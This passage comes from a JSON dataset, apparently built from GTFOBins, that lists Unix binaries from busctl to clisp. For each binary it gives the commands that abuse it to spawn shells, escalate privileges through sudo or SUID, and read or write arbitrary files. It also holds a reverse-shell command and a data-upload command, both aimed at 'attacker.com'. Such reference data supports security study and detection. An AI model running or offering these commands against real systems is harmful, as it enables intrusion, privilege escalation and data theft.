1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busctl:shell:1:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"]},{"id":"gtfo:busybox:inherit:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Execution"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:1:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:inherit:1:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:reverse-shell:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:reverse-shell:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:upload:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:busybox:upload:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"]},{"id":"gtfo:byebug:inherit:0:sudo","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/byebug/"]},{"id":"gtfo:byebug:inherit:0:unprivileged","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/byebug/"]},{"id":"gtfo:bzip2:file-read:0:sudo","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:bzip2:file-read:0:suid","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:bzip2:file-read:0:unprivileged","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bzip2/"]},{"id":"gtfo:cabal:shell:0:sudo","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cabal:shell:0:suid","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cabal:shell:0:unprivileged","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cabal/"]},{"id":"gtfo:cancel:upload:0:sudo","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:cancel:upload:0:suid","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:cancel:upload:0:unprivileged","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cancel/"]},{"id":"gtfo:capsh:shell:0:sudo","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:capsh:shell:0:suid","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --gid=0 --uid=0 --","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:capsh:shell:0:unprivileged","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/capsh/"]},{"id":"gtfo:cargo:inherit:0:sudo","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cargo/"]},{"id":"gtfo:cargo:inherit:0:unprivileged","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cargo/"]},{"id":"gtfo:cat:file-read:0:sudo","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cat:file-read:0:suid","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cat:file-read:0:unprivileged","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cat/"]},{"id":"gtfo:cdist:shell:0:sudo","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cdist/"]},{"id":"gtfo:cdist:shell:0:unprivileged","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cdist/"]},{"id":"gtfo:certbot:shell:0:sudo","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/certbot/"]},{"id":"gtfo:certbot:shell:0:unprivileged","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/certbot/"]},{"id":"gtfo:chattr:privilege-escalation:0:sudo","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chattr/"]},{"id":"gtfo:chattr:privilege-escalation:0:suid","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chattr/"]},{"id":"gtfo:check_by_ssh:shell:0:sudo","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"]},{"id":"gtfo:check_by_ssh:shell:0:unprivileged","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"]},{"id":"gtfo:check_cups:file-read:0:sudo","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_cups/"]},{"id":"gtfo:check_cups:file-read:0:unprivileged","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_cups/"]},{"id":"gtfo:check_log:file-read:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-read:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-write:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_log:file-write:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"]},{"id":"gtfo:check_memory:file-read:0:sudo","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_memory/"]},{"id":"gtfo:check_memory:file-read:0:unprivileged","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_memory/"]},{"id":"gtfo:check_raid:file-read:0:sudo","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_raid/"]},{"id":"gtfo:check_raid:file-read:0:unprivileged","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_raid/"]},{"id":"gtfo:check_ssl_cert:shell:0:sudo","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"]},{"id":"gtfo:check_ssl_cert:shell:0:unprivileged","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"]},{"id":"gtfo:check_statusfile:file-read:0:sudo","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"]},{"id":"gtfo:check_statusfile:file-read:0:unprivileged","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"]},{"id":"gtfo:chmod:privilege-escalation:0:sudo","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chmod/"]},{"id":"gtfo:chmod:privilege-escalation:0:suid","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chmod/"]},{"id":"gtfo:choom:shell:0:sudo","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:choom:shell:0:suid","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:choom:shell:0:unprivileged","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/choom/"]},{"id":"gtfo:chown:privilege-escalation:0:sudo","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chown/"]},{"id":"gtfo:chown:privilege-escalation:0:suid","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chown/"]},{"id":"gtfo:chroot:shell:0:sudo","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot /","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chroot/"]},{"id":"gtfo:chroot:shell:0:suid","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chroot/"]},{"id":"gtfo:chrt:shell:0:sudo","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:chrt:shell:0:suid","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh -p","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:chrt:shell:0:unprivileged","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/chrt/"]},{"id":"gtfo:clamscan:file-read:0:sudo","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clamscan:file-read:0:suid","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clamscan:file-read:0:unprivileged","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clamscan/"]},{"id":"gtfo:clisp:shell:0:sudo","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:clisp:shell:0:suid","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clisp/"]},{"id":"gtfo:clisp:shell:0:unprivileged","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command 